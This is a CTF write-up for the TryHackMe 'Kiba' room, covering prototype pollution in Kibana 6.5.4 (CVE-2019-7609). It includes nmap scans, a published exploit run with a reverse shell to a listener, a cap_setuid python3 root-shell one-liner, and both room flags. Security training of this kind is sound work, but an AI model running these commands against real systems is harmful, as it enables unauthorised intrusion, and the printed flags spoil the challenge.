
kiba-TryHackMe


What is Kibana?

Kibana is the open-source data visualization dashboard for Elasticsearch. For an overview see: https://www.elastic.co/what-is/kibana

This is a write-up for the Kiba room on TryHackMe. The room can be found here: https://tryhackme.com/room/kiba

 


Room Description

        Identify the critical security flaw in the data visualization dashboard that allows remote code execution.

#1 What is the vulnerability that is specific to programming languages with prototype-based inheritance?

The following article describes the issue in detail (and gives the answer):

https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/#:~:text=Prototype%20pollution%20is%20a%20vulnerability,lacks%20practical%20examples%20of%20exploitation.

Use :  prototype pollution
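To make the answer concrete, here is a small added example (written for this write-up; it is not code from the TryHackMe room, the securitum article or the exploit script used later). It shows the mechanism behind prototype pollution in general: a recursive merge helper (`mergeUnsafe`, a constructed stand-in for any "merge user input into config" routine) writes attacker-supplied keys onto `Object.prototype`, so an unrelated function (`buildChildEnv`, also constructed) that later reads `opts.env` from a fresh object picks up the attacker's value. The hardened `mergeSafe` beside it drops prototype-reaching keys and only descends into own properties. The JSON payload is constructed for the demo.

```javascript
// Added example, not code from the TryHackMe room, the linked securitum
// article or the exploit script used below. mergeUnsafe, mergeSafe,
// buildChildEnv and the attacker JSON are constructed for illustration.

// VULNERABLE: a typical recursive merge / "set by path" helper. It walks the
// keys of attacker-controlled `src` and, because it never filters the
// "__proto__" key, ends up writing into Object.prototype.
function mergeUnsafe(dst, src) {
  for (const key of Object.keys(src)) {
    const val = src[key];
    if (val !== null && typeof val === 'object') {
      // For key "__proto__", dst[key] is Object.prototype itself, so the
      // recursion below writes the attacker's keys onto every object.
      if (dst[key] === null || typeof dst[key] !== 'object') dst[key] = {};
      mergeUnsafe(dst[key], val);
    } else {
      dst[key] = val;
    }
  }
  return dst;
}

// HARDENED: same merge, but prototype-reaching keys are dropped and only
// own properties of `dst` are ever descended into.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function mergeSafe(dst, src) {
  for (const key of Object.keys(src)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = src[key];
    if (val !== null && typeof val === 'object') {
      const own = Object.prototype.hasOwnProperty.call(dst, key);
      if (!own || dst[key] === null || typeof dst[key] !== 'object') dst[key] = {};
      mergeSafe(dst[key], val);
    } else {
      dst[key] = val;
    }
  }
  return dst;
}

// Constructed attacker input, shaped like a JSON request body. JSON.parse
// creates an OWN property literally named "__proto__" (it does not set the
// prototype), which is what lets the merge above reach Object.prototype.
const ATTACKER_JSON = '{"label":"x","__proto__":{"env":{"INJECTED":"1"}}}';

// Unrelated code elsewhere in the app: builds a child-process environment
// from an options object that should only come from trusted configuration.
// After pollution, `opts.env` on a brand-new {} resolves via Object.prototype.
function buildChildEnv(opts) {
  return Object.assign({}, opts.env || {});
}

function demoUnsafe() {
  mergeUnsafe({}, JSON.parse(ATTACKER_JSON));
  const leaked = buildChildEnv({}).INJECTED; // "1": attacker value reached unrelated code
  delete Object.prototype.env;               // undo the pollution for the rest of the demo
  return leaked;
}

function demoSafe() {
  const cfg = mergeSafe({}, JSON.parse(ATTACKER_JSON));
  return { label: cfg.label, leaked: buildChildEnv({}).INJECTED }; // {label:"x", leaked:undefined}
}

// Quick check for a running process: a clean Object.prototype has no own
// "env" (or any other unexpected) property.
function prototypeIsClean(name) {
  return !Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

console.log('unsafe merge leaked:', demoUnsafe());
console.log('safe merge:', demoSafe());
console.log('Object.prototype clean afterwards:', prototypeIsClean('env'));
```

The takeaway for the room: once `Object.prototype` carries an attacker-chosen property, any code path in the same Node.js process that reads that property name from an object which does not define it will see the attacker's value, which is how a pollution in one feature turns into code execution somewhere else. Besides key filtering, creating config objects with `Object.create(null)` or freezing `Object.prototype` are common defences.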

#2 What is the version of visualization dashboard installed in the server?

Let's first enumerate the box with nmap to find all open TCP ports (a SYN scan needs root, hence sudo):

sudo nmap -sS -Pn -T4 -p- 10.10.125.142

Let's find out what is running on these open ports (note that -A already enables OS detection, so -O is redundant here):

sudo nmap -O -A -Pn -T4 -p22,80,5044,5601 10.10.125.142

The most interesting result of this scan is Kibana running on port 5601, the open-source data visualization dashboard for Elasticsearch.

Open http://10.10.125.142:5601 in a browser and look around the UI; the Kibana version is displayed there (Kibana's /api/status endpoint also reports it).

Use : 6.5.4

#3 What is the CVE number for this vulnerability?  This will be in the format: CVE-0000-0000

Now that we have the application name (Kibana) and its version, a quick search turns up the CVE. The details are also in the article linked in answer #1.

Use : CVE-2019-7609

#4 Compromise the machine and locate user.txt

Let's exploit the CVE and get a reverse shell. I used an already published exploit, available here:

https://github.com/LandGrey/CVE-2019-7609/  

First start a netcat listener on the attacking machine:

nc -nlvp 9999

and run the exploit, where -u is the Kibana URL and -host/-port point back at the listener (10.10.10.10 stands for the attacking machine's address; replace it with your own):

python CVE-2019-7609-kibana-rce.py -u http://10.10.41.246:5601 -host 10.10.10.10 -port 9999 --shell

We will get the reverse shell and the user flag:

Use : THM{1s_easy_pwn3d_k1bana_w1th_rce}

#5 Capabilities is a concept that provides a security system that allows "dividing" root privileges into different values

Nice to know; no answer needed.

#6 How would you recursively list all of these capabilities?

Use : getcap -r /

(Appending 2>/dev/null hides the permission-denied noise from directories the current user cannot read.)

#7 Escalate privileges and obtain root.txt

Use the above command to find capabilities that can be abused, and we will find that the python3 binary in /home/kiba/.hackmeplease has cap_setuid set. With cap_setuid the process may call setuid() to any UID without being root, so we can switch to UID 0 and then spawn a shell:

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

and the root flag at /root/root.txt:  
 
Use :  THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es}


Submit the flag and get the points :D See you next time.


 
